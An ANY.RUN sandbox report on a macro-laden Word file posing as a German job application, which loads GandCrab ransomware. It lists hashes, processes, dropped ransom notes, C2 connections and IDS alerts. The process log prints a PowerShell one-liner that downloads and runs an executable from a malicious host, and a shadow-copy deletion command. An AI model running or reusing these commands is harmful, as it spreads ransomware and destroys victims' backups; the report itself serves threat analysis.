analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Bewerbung_Lena_Schwarz.doc

Full analysis: https://app.any.run/tasks/ee03efab-61a5-4a7f-8121-73159b429e82
Verdict: Malicious activity
Threats:

GandCrab is probably one of the most famous Ransomware. A Ransomware is a malware that asks the victim to pay money in order to restore access to encrypted files. If the user does not cooperate the files are forever lost.

Analysis date: December 18, 2018, 11:11:31
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
ransomware
gandcrab
loader
trojan
Indicators:
MIME: application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info: Microsoft Word 2007+
MD5:

E9CE01FB0F565A95B8BF66A0FA32D11B

SHA1:

5B9B714AF457F7813BAAAD07B85C2BB8D2AE51F2

SHA256:

A75EF9B9FE8F637EEF6348F2F3AAB7F635FC0B64F383F49B06D84B54121A7A17

SSDEEP:

1536:SYzOtUwRhX/i2nR3BxHlqKOfLK8eps7B7gClU6ragbn7JJJUJJJPjGYAGDKJJJJo:F0UqX/icFBBYfWJsdLragb7JJJUJJJPL

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • ctftvkegqqyvcgmqcrbbttznbxrqj.exe (PID: 2860)
    • GandCrab keys found

      • ctftvkegqqyvcgmqcrbbttznbxrqj.exe (PID: 2860)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2804)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2932)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2932)
    • Actions looks like stealing of personal data

      • ctftvkegqqyvcgmqcrbbttznbxrqj.exe (PID: 2860)
    • Writes file to Word startup folder

      • ctftvkegqqyvcgmqcrbbttznbxrqj.exe (PID: 2860)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3268)
    • Renames files like Ransomware

      • ctftvkegqqyvcgmqcrbbttznbxrqj.exe (PID: 2860)
    • Dropped file may contain instructions of ransomware

      • ctftvkegqqyvcgmqcrbbttznbxrqj.exe (PID: 2860)
    • Deletes shadow copies

      • ctftvkegqqyvcgmqcrbbttznbxrqj.exe (PID: 2860)
    • Connects to CnC server

      • ctftvkegqqyvcgmqcrbbttznbxrqj.exe (PID: 2860)
    • Changes settings of System certificates

      • ctftvkegqqyvcgmqcrbbttznbxrqj.exe (PID: 2860)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 3268)
      • ctftvkegqqyvcgmqcrbbttznbxrqj.exe (PID: 2860)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3268)
    • Creates files like Ransomware instruction

      • ctftvkegqqyvcgmqcrbbttznbxrqj.exe (PID: 2860)
    • Creates files in the program directory

      • ctftvkegqqyvcgmqcrbbttznbxrqj.exe (PID: 2860)
    • Reads the cookies of Mozilla Firefox

      • ctftvkegqqyvcgmqcrbbttznbxrqj.exe (PID: 2860)
    • Adds / modifies Windows certificates

      • ctftvkegqqyvcgmqcrbbttznbxrqj.exe (PID: 2860)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2932)
    • Dropped object may contain Bitcoin addresses

      • powershell.exe (PID: 3268)
      • WINWORD.EXE (PID: 2932)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2932)
    • Dropped object may contain TOR URL's

      • ctftvkegqqyvcgmqcrbbttznbxrqj.exe (PID: 2860)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.docm | Word Microsoft Office Open XML Format document (with Macro) (53.6)
.docx | Word Microsoft Office Open XML Format document (24.2)
.zip | Open Packaging Conventions container (18)
.zip | ZIP compressed archive (4.1)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0006
ZipCompression: Deflated
ZipModifyDate: 1980:01:01 00:00:00
ZipCRC: 0x23cbfb46
ZipCompressedSize: 404
ZipUncompressedSize: 1511
ZipFileName: [Content_Types].xml

XML

Template: summerjam
TotalEditTime: -
Pages: 1
Words: -
Characters: 1
Application: Microsoft Office Word
DocSecurity: None
Lines: 1
Paragraphs: 1
ScaleCrop: No
Company: -
LinksUpToDate: No
CharactersWithSpaces: 1
SharedDoc: No
HyperlinksChanged: No
AppVersion: 16
Keywords: -
LastModifiedBy: User
RevisionNumber: 2
CreateDate: 2018:12:18 05:42:00Z
ModifyDate: 2018:12:18 05:50:00Z

XMP

Title: -
Subject: -
Creator: User
Description: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
39
Monitored processes
5
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start winword.exe no specs cmd.exe no specs powershell.exe #GANDCRAB ctftvkegqqyvcgmqcrbbttznbxrqj.exe wmic.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2932"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Bewerbung_Lena_Schwarz.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
2804cmd /c powErshEll(New-Object System.Net.WebClient).DownloadFile('http://topwarenhub.top/summerjam.exe','%temp%\ctftvkegqqyvcgmqcrbbttznbxrqj.exe');start %temp%\ctftvkegqqyvcgmqcrbbttznbxrqj.exeC:\Windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3268powErshEll (New-Object System.Net.WebClient).DownloadFile('http://topwarenhub.top/summerjam.exe','C:\Users\admin\AppData\Local\Temp\ctftvkegqqyvcgmqcrbbttznbxrqj.exe');start C:\Users\admin\AppData\Local\Temp\ctftvkegqqyvcgmqcrbbttznbxrqj.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2860"C:\Users\admin\AppData\Local\Temp\ctftvkegqqyvcgmqcrbbttznbxrqj.exe" C:\Users\admin\AppData\Local\Temp\ctftvkegqqyvcgmqcrbbttznbxrqj.exe
powershell.exe
User:
admin
Integrity Level:
MEDIUM
2164"C:\Windows\system32\wbem\wmic.exe" shadowcopy deleteC:\Windows\system32\wbem\wmic.exectftvkegqqyvcgmqcrbbttznbxrqj.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
WMI Commandline Utility
Exit code:
2147749908
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 291
Read events
1 144
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
281
Text files
214
Unknown types
15

Dropped files

PID
Process
Filename
Type
2932WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR6A24.tmp.cvr
MD5:
SHA256:
2932WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\33BD505C.png
MD5:
SHA256:
3268powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LJR8CFCOO0BUJRP8C7AZ.temp
MD5:
SHA256:
2860ctftvkegqqyvcgmqcrbbttznbxrqj.exeC:\Users\admin\.oracle_jre_usage\90737d32e3abaa4.timestamp
MD5:
SHA256:
2860ctftvkegqqyvcgmqcrbbttznbxrqj.exeC:\Users\admin\AppData\Local\VirtualStore\EPARSIFQC-DECRYPT.txttext
MD5:FA8B1B076C1654215F27813425A61BD3
SHA256:8A777F9A8883BC9D7A8B6ACAE7660EAC32D55B4EB3E55993F5DA36F2F44D7D81
2860ctftvkegqqyvcgmqcrbbttznbxrqj.exeC:\Users\admin\AppData\EPARSIFQC-DECRYPT.txttext
MD5:FA8B1B076C1654215F27813425A61BD3
SHA256:8A777F9A8883BC9D7A8B6ACAE7660EAC32D55B4EB3E55993F5DA36F2F44D7D81
2860ctftvkegqqyvcgmqcrbbttznbxrqj.exeC:\Users\admin\AppData\Local\VirtualStore\Program Files\EPARSIFQC-DECRYPT.txttext
MD5:FA8B1B076C1654215F27813425A61BD3
SHA256:8A777F9A8883BC9D7A8B6ACAE7660EAC32D55B4EB3E55993F5DA36F2F44D7D81
3268powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF2474b3.TMPbinary
MD5:6073B6FC66D2E68644893344F6904E4A
SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3
2860ctftvkegqqyvcgmqcrbbttznbxrqj.exeC:\Users\admin\AppData\Roaming\Adobe\Acrobat\EPARSIFQC-DECRYPT.txttext
MD5:FA8B1B076C1654215F27813425A61BD3
SHA256:8A777F9A8883BC9D7A8B6ACAE7660EAC32D55B4EB3E55993F5DA36F2F44D7D81
2860ctftvkegqqyvcgmqcrbbttznbxrqj.exeC:\Users\admin\.oracle_jre_usage\EPARSIFQC-DECRYPT.txttext
MD5:FA8B1B076C1654215F27813425A61BD3
SHA256:8A777F9A8883BC9D7A8B6ACAE7660EAC32D55B4EB3E55993F5DA36F2F44D7D81
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
39
TCP/UDP connections
69
DNS requests
34
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2860
ctftvkegqqyvcgmqcrbbttznbxrqj.exe
GET
78.46.77.98:80
http://www.2mmotorsport.biz/
DE
suspicious
2860
ctftvkegqqyvcgmqcrbbttznbxrqj.exe
GET
301
83.138.82.107:80
http://www.swisswellness.com/
DE
whitelisted
2860
ctftvkegqqyvcgmqcrbbttznbxrqj.exe
GET
302
192.185.159.253:80
http://www.pizcam.com/
US
malicious
3268
powershell.exe
GET
200
46.238.18.157:80
http://topwarenhub.top/summerjam.exe
BG
executable
239 Kb
malicious
2860
ctftvkegqqyvcgmqcrbbttznbxrqj.exe
GET
200
217.26.53.161:80
http://www.haargenau.biz/
CH
html
13.3 Kb
malicious
2860
ctftvkegqqyvcgmqcrbbttznbxrqj.exe
POST
401
136.243.13.215:80
http://www.holzbock.biz/wp-content/pictures/thkaso.jpg
DE
text
119 b
suspicious
2860
ctftvkegqqyvcgmqcrbbttznbxrqj.exe
GET
212.59.186.61:80
http://www.hotelweisshorn.com/
CH
malicious
2860
ctftvkegqqyvcgmqcrbbttznbxrqj.exe
GET
301
69.16.175.10:80
http://www.hardrockhoteldavos.com/
US
html
158 b
whitelisted
2860
ctftvkegqqyvcgmqcrbbttznbxrqj.exe
GET
301
104.24.23.22:80
http://www.belvedere-locarno.com/
US
shared
2860
ctftvkegqqyvcgmqcrbbttznbxrqj.exe
GET
301
212.59.186.61:80
http://www.morcote-residenza.com/
CH
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2860
ctftvkegqqyvcgmqcrbbttznbxrqj.exe
212.59.186.61:80
www.hotelweisshorn.com
green.ch AG
CH
malicious
2860
ctftvkegqqyvcgmqcrbbttznbxrqj.exe
138.201.162.99:80
www.fliptray.biz
Hetzner Online GmbH
DE
malicious
2860
ctftvkegqqyvcgmqcrbbttznbxrqj.exe
78.46.77.98:443
www.2mmotorsport.biz
Hetzner Online GmbH
DE
suspicious
2860
ctftvkegqqyvcgmqcrbbttznbxrqj.exe
138.201.162.99:443
www.fliptray.biz
Hetzner Online GmbH
DE
malicious
2860
ctftvkegqqyvcgmqcrbbttznbxrqj.exe
217.26.53.161:80
www.haargenau.biz
Hostpoint AG
CH
malicious
2860
ctftvkegqqyvcgmqcrbbttznbxrqj.exe
78.46.77.98:80
www.2mmotorsport.biz
Hetzner Online GmbH
DE
suspicious
3268
powershell.exe
46.238.18.157:80
topwarenhub.top
Mobiltel Ead
BG
suspicious
2860
ctftvkegqqyvcgmqcrbbttznbxrqj.exe
83.138.82.107:80
www.swisswellness.com
hostNET Medien GmbH
DE
suspicious
2860
ctftvkegqqyvcgmqcrbbttznbxrqj.exe
192.185.159.253:80
www.pizcam.com
CyrusOne LLC
US
malicious
2860
ctftvkegqqyvcgmqcrbbttznbxrqj.exe
192.185.159.253:443
www.pizcam.com
CyrusOne LLC
US
malicious

DNS requests

Domain
IP
Reputation
topwarenhub.top
  • 46.238.18.157
  • 212.237.112.81
  • 143.208.165.41
  • 92.86.0.85
  • 78.90.243.124
  • 2.89.137.57
  • 213.214.95.88
  • 95.158.162.200
  • 89.17.225.163
  • 188.142.243.84
malicious
www.2mmotorsport.biz
  • 78.46.77.98
unknown
www.haargenau.biz
  • 217.26.53.161
unknown
www.bizziniinfissi.com
  • 74.220.215.73
malicious
www.holzbock.biz
  • 136.243.13.215
unknown
www.fliptray.biz
  • 138.201.162.99
malicious
www.pizcam.com
  • 192.185.159.253
unknown
www.swisswellness.com
  • 83.138.82.107
whitelisted
www.hotelweisshorn.com
  • 212.59.186.61
unknown
www.whitepod.com
  • 83.166.138.7
whitelisted

Threats

PID
Process
Class
Message
Potentially Bad Traffic
ET DNS Query to a *.top domain - Likely Hostile
3268
powershell.exe
A Network Trojan was detected
ET CURRENT_EVENTS SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016
3268
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
3268
powershell.exe
Potentially Bad Traffic
ET INFO HTTP Request to a *.top domain
3268
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3268
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3268
powershell.exe
Misc activity
ET INFO Possible EXE Download From Suspicious TLD
2860
ctftvkegqqyvcgmqcrbbttznbxrqj.exe
A Network Trojan was detected
ET POLICY Data POST to an image file (gif)
2860
ctftvkegqqyvcgmqcrbbttznbxrqj.exe
A Network Trojan was detected
ET TROJAN [eSentire] Win32/GandCrab v4/5 Ransomware CnC Activity
2860
ctftvkegqqyvcgmqcrbbttznbxrqj.exe
A Network Trojan was detected
MALWARE [PTsecurity] Win32/GandCrab Ransomware CnC Activity
No debug info